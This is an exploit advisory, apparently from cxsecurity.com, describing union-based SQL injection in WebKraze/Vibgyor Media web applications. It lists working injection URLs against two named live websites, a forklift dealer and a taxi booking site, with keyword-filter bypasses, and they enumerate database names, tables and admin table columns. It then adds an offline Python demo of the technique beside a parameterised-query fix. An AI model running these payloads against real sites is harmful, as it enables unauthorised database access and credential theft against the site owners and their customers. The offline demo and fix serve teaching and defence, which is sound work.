WebKraze,Vibgyor Media Web Application Union-based Sql Injection

2024.12.28
Razi (AE)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: WebKraze,Vibgyor Media Web Application Union-based Sql Injection
# Date: 2024-12-25
# Exploit Author: Parastou Razi
# Contact: razi.parastoo@gmail.com
# Category: webapps
# Tested On: Windows, Firefox

Proof of Concept:

1. Description:

When an application is vulnerable to SQL injection and the results of the query are returned in the application's responses, the UNION keyword can be used to append a second SELECT to the original query and retrieve data from other tables in the database. This is commonly known as a SQL injection UNION attack. The attacker uses the UNION operator to combine the application's own SELECT with an attacker-controlled one; the injected SELECT must return the same number of columns, with compatible data types, as the original, otherwise the database rejects the combined statement. A vulnerable application passes the combined statement to the database, which executes both parts and renders the injected rows where it would normally render the product or booking data.

[+] To confirm the injection point, append a single quote (') to the id parameter. The page content changes, because the quote breaks out of the SQL string literal and the statement no longer parses as intended:

https://www.alikhalafforklifts.com/products.php?id=22
https://www.alikhalafforklifts.com/products.php?id=22'
https://www.airporttaxiforsure.com/local-taxi-hire-booking?id=1093
https://www.airporttaxiforsure.com/local-taxi-hire-booking?id=1093'

2. Proof

Each payload negates the id so that the original SELECT matches no row and only the injected row is rendered, pads the injected SELECT to the column count of the original query (23 columns on the first target, 27 on the second), places the expression to be read in the column that is displayed on the page (column 2 and column 16 respectively), wraps UNION and FROM in MySQL version comments (/*!12345union*/, which MySQL executes as the keyword and which gets past simple keyword filters), and terminates the statement with a comment (%23 is '#', --+ is '-- ').

#Demo 1:

Database name:
https://www.alikhalafforklifts.com/products.php?id=-22%27%20/*!12345union*/%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*!froM*/information_schema.schemata%23--+

Table names in the vibgyorm_alikhalif schema:
http://www.alikhalafforklifts.com/products.php?id=-22%27%20/*!12345union*/%20select%201,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*!FROM*/information_schema./*!tables*/%20WHERE%20table_schema=%22vibgyorm_alikhalif%22%23--+

#Demo2:

Database name:
https://www.airporttaxiforsure.com/local-taxi-hire-booking?id=-1093%27%20/*!12345UNION*/%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,database(),17,18,19,20,21,22,23,24,25,26,27/*!FROM*/%20information_schema.schemata--+

Table names in the wwwwegoc_atforsure schema:
https://www.airporttaxiforsure.com/local-taxi-hire-booking?id=-1093%27/*!12345UNION*/%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,table_name,17,18,19,20,21,22,23,24,25,26,27/*!FROM*/information_schema./*!tables*/%20WHERE%20table_schema=%22wwwwegoc_atforsure%22--+

Column names of the admin table:
https://www.airporttaxiforsure.com/local-taxi-hire-booking?id=-1093%27/*!12345UNION*/%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,column_name,17,18,19,20,21,22,23,24,25,26,27/*!FROM*/%20information_schema.columns%20WHERE%20table_name=%22admin%22%23
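The following is an added example, not part of the advisory and not code from the affected applications. It reproduces the three steps above offline against an in-memory SQLite database: the single-quote probe, the column-count matching that explains why the payloads carry exactly 23 or 27 numbers, and the UNION SELECT that reads other tables, beside the parameterised query that closes the hole. The products and admin tables, their five columns, the sample rows and all function names are assumptions; SQLite's sqlite_master stands in for MySQL's information_schema, and a plain UNION with a `-- ` terminator replaces the /*!12345union*/ and # forms, which SQLite does not support.

```python
import sqlite3


# Constructed sample schema: 5 columns stand in for the 23 and 27 that the
# two advisory targets expose; the admin row holds made-up data.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price REAL, sku TEXT, descr TEXT);
        INSERT INTO products VALUES (22, 'Forklift', 9999.0, 'FL-22', 'sample row');
        CREATE TABLE admin(username TEXT, password TEXT);
        INSERT INTO admin VALUES ('admin', 'constructed-sample-hash');
    """)
    return db


def lookup_vulnerable(db, product_id):
    # Same bug class as products.php?id=: the parameter is pasted into the
    # statement, so a quote closes the literal and the rest is parsed as SQL.
    sql = f"SELECT * FROM products WHERE id='{product_id}'"
    return db.execute(sql).fetchall()


def lookup_safe(db, product_id):
    # Parameterised fix: the whole value is bound as one string literal.
    return db.execute("SELECT * FROM products WHERE id=?", (product_id,)).fetchall()


def quote_breaks_query(db, product_id):
    """Step 1 of the advisory: append a single quote and see whether the
    page changes. Here 'changes' means the statement no longer parses."""
    try:
        lookup_vulnerable(db, f"{product_id}'")
        return False
    except sqlite3.OperationalError:
        return True


def union_payload(product_id, n_cols, pos, expr, from_clause=None):
    """Build the `-22' UNION SELECT 1,2,...,expr,...,N FROM x -- ` payload
    shape used in the advisory. The negated id makes the original SELECT
    match nothing, so the injected row is the one rendered; `pos` is the
    1-based column whose value is visible in the response."""
    cols = [str(i) for i in range(1, n_cols + 1)]
    cols[pos - 1] = expr
    tail = f" FROM {from_clause}" if from_clause else ""
    # MySQL targets get `/*!12345union*/ ... #--+`; SQLite has neither the
    # version-comment trick nor `#`, so a plain UNION and `-- ` are used.
    return f"-{product_id}' UNION SELECT {','.join(cols)}{tail} -- "


def find_column_count(db, product_id, max_cols=40):
    """Why the PoC carries exactly 23 (or 27) numbers: a UNION with the
    wrong column count is a hard error, so step up until one succeeds."""
    for n in range(1, max_cols + 1):
        try:
            lookup_vulnerable(db, union_payload(product_id, n, 1, "1"))
            return n
        except sqlite3.OperationalError:
            continue
    return None


def extract(db, product_id, n_cols, pos, expr, from_clause=None):
    """Run a UNION payload and return the set of values landing in `pos`."""
    rows = lookup_vulnerable(db, union_payload(product_id, n_cols, pos, expr, from_clause))
    return {row[pos - 1] for row in rows}


def run_demo():
    db = make_db()
    n = find_column_count(db, 22)
    return {
        "quote_breaks": quote_breaks_query(db, 22),
        "columns": n,
        # sqlite_master plays the role of information_schema.tables here
        "tables": extract(db, 22, n, 2, "name", "sqlite_master WHERE type='table'"),
        # the advisory's last step lists the admin columns; here the DDL is read
        "admin_ddl": extract(db, 22, n, 2, "sql", "sqlite_master WHERE name='admin'"),
        "admin_rows": extract(db, 22, n, 2, "username || ':' || password", "admin"),
        # the same payload through the parameterised query matches nothing
        "safe": lookup_safe(db, union_payload(22, n, 2, "name", "sqlite_master")),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The column probe is the part worth keeping in a toolbox: against a real target the visible symptom of a wrong count is an error page or an empty response, and the padded numbers in the advisory's URLs are simply the first count at which the UNION stopped failing. Note that `lookup_safe` does not strip or escape anything; binding the parameter is enough, because the driver never lets the value reach the parser as SQL.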

References:

https://portswigger.net/web-security/sql-injection


Copyright 2025, cxsecurity.com
